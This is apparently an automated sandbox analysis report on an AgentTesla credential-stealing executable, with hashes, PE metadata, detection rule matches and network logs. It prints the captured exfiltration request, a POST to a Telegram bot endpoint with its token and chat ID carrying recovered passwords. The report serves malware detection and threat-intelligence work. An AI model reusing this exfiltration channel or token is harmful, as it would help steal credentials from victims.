http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C6000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430866
Start date and time:	2024-04-24 10:15:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 47 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse
	X1.exe	Get hash	malicious	XWorm	Browse
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse
	X2.exe	Get hash	malicious	XWorm	Browse
	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	gmb.xls	Get hash	malicious	Unknown	Browse
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	explorer.exe	Get hash	malicious	RedLine, XWorm	Browse	149.154.167.220
	X1.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse	149.154.167.220
	X2.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	gmb.xls	Get hash	malicious	Unknown	Browse	149.154.167.220
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	X1.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse	149.154.167.220
	X2.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	gmb.xls	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Nekark.22288.17032.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://telegrambot-fix.pages.dev/bot.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	load_startup.txt.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	M_F+niestandardowy stempel.xlsx.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	149.154.167.220
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	DAIKIN AC SPAIN 2024.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	transferencia.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.993273203425258
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
File size:	243'200 bytes
MD5:	ab696103426e266ed3729c899e11e778
SHA1:	12aa01403e8f348853598d6da5b304da02cc3d57
SHA256:	7151fdf1eb6797e332cdd21c6084e1b338f84fb6652284599370cf609776a676
SHA512:	df792f6ec7c1be0beaf28d66a65939769c3a22906b8ad27b1adb7c8b2550e31a958d590f75d5aace2b9df3ca20ed976c665bc0e470c12307620c94133b4d6c50
SSDEEP:	3072:/dcBPLoH7/bX6xMlxNiIfneSi3gpzUiJ5LIJyEOC2i:/dcBPUH7/bXSMlxNiI/eSNoiQJy99
TLSH:	81341F037E88EB15E1A87E3782EF2D2413B2B4C71633D60B5F49AF6618512825D7E72D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t3&f................................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x43ca0e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66263374 [Mon Apr 22 09:52:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c9bc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3e000	0x546	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x40000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3aa14	0x3ac00	1c15002a6313e0f43c3a612bd7a823c6	False	0.35701878324468084	data	5.004610180764335	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x3e000	0x546	0x600	e8a581ef34c099bfb41ac9cfb5e0303e	False	0.4010416666666667	data	4.000397557777239	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x40000	0xc	0x200	e7e1830b66ec557bbe5d536c0541697c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3e0a0	0x2bc	data			0.44
RT_MANIFEST	0x3e35c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-10:16:17.850504	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49730	443	192.168.2.4	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 10:16:16.487485886 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:16.487541914 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:16.487649918 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:16.497437954 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:16.497464895 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:17.424274921 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:17.424372911 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:17.427475929 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:17.427486897 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:17.427742004 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:17.470088959 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:17.491588116 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:17.532156944 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:17.850373030 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:17.850410938 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:18.090320110 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:18.142000914 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:18.399952888 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:18.400059938 CEST	443	49730	149.154.167.220	192.168.2.4
Apr 24, 2024 10:16:18.400156975 CEST	49730	443	192.168.2.4	149.154.167.220
Apr 24, 2024 10:16:18.410449982 CEST	49730	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 10:16:16.323823929 CEST	62621	53	192.168.2.4	1.1.1.1
Apr 24, 2024 10:16:16.478054047 CEST	53	62621	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 10:16:16.323823929 CEST	192.168.2.4	1.1.1.1	0x27d4	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 10:16:16.478054047 CEST	1.1.1.1	192.168.2.4	0x27d4	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	149.154.167.220	443	3872	C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:16:17 UTC	260	OUT	POST /bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc64479371e3d5 Host: api.telegram.org Content-Length: 914 Expect: 100-continue Connection: Keep-Alive
2024-04-24 08:16:17 UTC	914	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 34 37 39 33 37 31 65 33 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 35 38 30 38 37 30 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 34 37 39 33 37 31 65 33 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 34 2f 32 30 32 34 20 31 30 3a 31 36 3a 31 35 0a 55 73 65 72 20 Data Ascii: -----------------------------8dc64479371e3d5Content-Disposition: form-data; name="chat_id"595808702-----------------------------8dc64479371e3d5Content-Disposition: form-data; name="caption"New PW Recovered!Time: 04/24/2024 10:16:15User
2024-04-24 08:16:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-04-24 08:16:18 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 24 Apr 2024 08:16:18 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Analysis Process: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exePID: 3872, Parent PID: 2580

General

Target ID:	0
Start time:	10:16:15
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe"
Imagebase:	0x7ff7699e0000
File size:	243'200 bytes
MD5 hash:	AB696103426E266ED3729C899E11E778
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2889163730.00000000026BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exePID: 3872, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	2

Executed Functions

Function 025B9B20 Relevance: 2.8, Instructions: 2824COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce380bfda1c816daf5381c35d079f2a9d0a3bb11c8c477ca6cbd715a960efe5
Instruction ID: 025752b99bd3de621a88162b96b9be8f50a5da666b5f34a005559b3a2afc480b
Opcode Fuzzy Hash: 9ce380bfda1c816daf5381c35d079f2a9d0a3bb11c8c477ca6cbd715a960efe5
Instruction Fuzzy Hash: 3353E731C10B1A8ACB51EF68C8906D9F7B1FF99300F15D79AE45877221EB70AAD5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 025BCD98 Relevance: 2.3, Instructions: 2313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4865c3a3568ae210103e8d011fdee25a80eb831532600d88845f393a74df758f
Instruction ID: 7720e5e6860fcb5ba968c0e94cb57c1c5c9d6766a03e73ad2115eb3691540826
Opcode Fuzzy Hash: 4865c3a3568ae210103e8d011fdee25a80eb831532600d88845f393a74df758f
Instruction Fuzzy Hash: 11332D31D107198ECB11EF68C8906EDF7B1FF99300F55D69AE458A7221EB70AAC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 025B4A48 Relevance: .3, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cadf0ff645bde41a4365fdd537dec46c33e57949e20a836f225b6d37b8e957ae
Instruction ID: c3600cd837def626cc8bee3cf97970ecbfc26113453040df65bc9531ae90fde6
Opcode Fuzzy Hash: cadf0ff645bde41a4365fdd537dec46c33e57949e20a836f225b6d37b8e957ae
Instruction Fuzzy Hash: 24B16C70E002098FDF21CFA8D8A57EDBBF2BF88714F148529D815EB295EB749845CB85

Uniqueness

Uniqueness Score: -1.00%

Function 025B3E30 Relevance: .2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66dab034bfbb50c87e253fe427e26fe9b144f8f4e74bbed251d392e129aaeaf2
Instruction ID: 2e419d1b8a20a939c8d12030fe9798aceaef0bfee704c39240582626b268a6f2
Opcode Fuzzy Hash: 66dab034bfbb50c87e253fe427e26fe9b144f8f4e74bbed251d392e129aaeaf2
Instruction Fuzzy Hash: 57915E70E00209DFDF15CFA9C9957EDBBF2BF48314F148529E415A7254EB349885CB85

Uniqueness

Uniqueness Score: -1.00%

Function 025B6E97 Relevance: 2.6, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 025B6F53
LR^q, xrefs: 025B6ECE

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID: LR^q$LR^q
API String ID: 0-4089051495
Opcode ID: e5633ddc1a57d6738b57fcfb7c2b473e5f559fdfe84301e4854a626aeeca6ee8
Instruction ID: 80f521b9ab5cff11939c05f513e64cd011a390b25109c759e52b9995b77bd64c
Opcode Fuzzy Hash: e5633ddc1a57d6738b57fcfb7c2b473e5f559fdfe84301e4854a626aeeca6ee8
Instruction Fuzzy Hash: 5051D431E002599FDB16DF78C4547AEBBB6FF85300F20846AE405EB284EB719C46CB56

Uniqueness

Uniqueness Score: -1.00%

Function 025BF2DD Relevance: 2.6, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 025BF42B
], xrefs: 025BF2CD

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID: PH^q$]
API String ID: 0-1327238341
Opcode ID: 650114ab37574e0fc58767fbddabe054a2efbfed7a6e1a2e5663ed957fb17590
Instruction ID: ecb29a03379316f23c1b854e259255d5d38e595fed2557483b6b989b2fff0bda
Opcode Fuzzy Hash: 650114ab37574e0fc58767fbddabe054a2efbfed7a6e1a2e5663ed957fb17590
Instruction Fuzzy Hash: C641EE30B042058FDB06AB38C9147AE7BA2BF85344F24447AE406DB395EF39CD46C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 06470C70 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06470D31

Memory Dump Source

Source File: 00000000.00000002.2891556250.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6470000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: eac09c0d44e5dfdcb2b5f89fc79a577725a516af8582c777ac924a9de0c7a054
Instruction ID: d0456a6e2893d03b7a867570b136f4e3c5dd5e0b5677b24fe6009426df79d659
Opcode Fuzzy Hash: eac09c0d44e5dfdcb2b5f89fc79a577725a516af8582c777ac924a9de0c7a054
Instruction Fuzzy Hash: 314138B4A00709CFDB54CF99C488AAABBF5FF88314F24C459D519AB321D774A845CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 064732E0 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 0647333D

Memory Dump Source

Source File: 00000000.00000002.2891556250.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6470000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bd3b4250ca88cc289f1ec322a7ef56dcc1d2599b4258460f10687fa985cc0099
Instruction ID: 938a9a509ee4882d62487e07d26e19d6694c97feeb86a06e5040888f9496678c
Opcode Fuzzy Hash: bd3b4250ca88cc289f1ec322a7ef56dcc1d2599b4258460f10687fa985cc0099
